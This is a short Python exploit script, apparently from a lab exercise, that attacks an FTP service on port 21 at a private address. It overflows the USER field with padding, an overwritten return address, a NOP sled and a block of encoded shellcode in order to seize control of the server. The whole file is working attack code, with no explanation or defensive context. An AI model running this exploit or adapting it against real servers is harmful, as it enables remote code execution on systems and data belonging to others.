
import socket

target = "192.168.56.102"
port = 21

print ("[+] Connecting to target.")
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(10)
soc.connect((target,port))

print("[+] Received a banner.")
print(soc.recv(1024))

junk1 = "A"*230
eip = "\x3F\x93\xB7\x7C"
junk2 = "C"*266


buf =  ""
buf += "\x33\xc9\x83\xe9\xb8\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xbe\x91\x19\x96\x83\xee\xfc\xe2\xf4\x67\x7a"
buf += "\x82\x4f\xca\xb5\xed\xa7\x6c\x23\x6e\xa7\x77\xf5\x92"
buf += "\xe7\x8e\x1a\x6f\x9a\x35\xe7\x05\x1d\xf8\x99\x92\xe8"
buf += "\x9e\x1a\x2f\xae\xf1\x89\x6c\x65\xe7\x90\xc8\x69\x5f"
buf += "\xf1\x92\xfa\x9a\xb5\x92\xd3\x82\x1a\x4d\xbe\xc6\x90"
buf += "\xf3\x1d\xf4\x89\x92\xcc\x9e\x90\xf2\x75\x8a\xd8\x92"
buf += "\xa2\x35\x90\xf7\xa7\x41\xa0\xd9\x6a\x12\x15\xd9\xe2"
buf += "\xb9\x50\xd6\x9b\xbf\x56\xf2\x62\x85\xed\x3d\xbe\xcb"
buf += "\x70\x92\xcc\x9a\x90\xf2\xf0\x35\x9d\x52\x1d\xe4\x8d"
buf += "\x18\x7d\x35\x95\x92\x97\x56\x18\x5d\xb2\xa2\xf0\xda"
buf += "\x24\xb6\xb8\xcd\x1f\x5b\x18\xdb\xfe\x30\xdf\x17\x7a"
buf += "\xec\x79\x86\x69\x41\x6e\x90\xd3\xba\x2a\x67\x4e\x5c"
buf += "\xe2\x9e\x8a\x9a\xc3\xf1\x18\x41\x6e\xe6\x1f\xfb\x99"
buf += "\x71\xfa\xd2\xb1\x58\xfe\x8d\xa3\x37\xf2\xd6\xe4\x6a"
buf += "\xf3\xcc\xa1\xc2\x1e\xe2\xb5\x13\x1f\x58\xc7\xe6\xc3"
buf += "\xba\x18\xdb\xc6\x05\x39\xbb\xdb\x02\x16\x05\xb2\xec"
buf += "\x79\x46\x69\x41\x6e\x71\xf9\xc6\xc9\x39\xfe\xdf\xf6"
buf += "\x7c\xd4\xd6\xdc\x7c\xe5\xcd\xa0\xc2\x1e\xe2\xb5\x13"
buf += "\x1f\x5d\xf9\x52\xd3\xfa\xc9\x71\xb6\xf6\xd0\x5a\xfe"
buf += "\x9e\xd0\x4b\xd3\xd6\xbd\x40\xd9\xeb\xf9\x5d\xd7\xf0"
buf += "\xd8\x71\xd8\xf7\xb1\x57\xfe\x9e\xdf\x5d\xd7\xd6\xc5"
buf += "\x4c\xdd\xf1\xa0\xd0\x1e\xf2\xb5\x06\x1f\x5f\xa0\xcb"
buf += "\xc4\xed\xc0\x4b\x69\x6e\xa0\xd9\xc6\x41\xc4\x11\x96"

nops="\x90" * 16
username = junk1 + eip + nops + buf + junk2
password = "hacker"


print("[+] Sending Crendential.")
soc.send("USER " + username + "\r\n")
print(soc.recv(1024))


soc.send("PASS " + password + "\r\n")
print(soc.recv(1024))

print("[+] Done! Closing connection.")
soc.close()


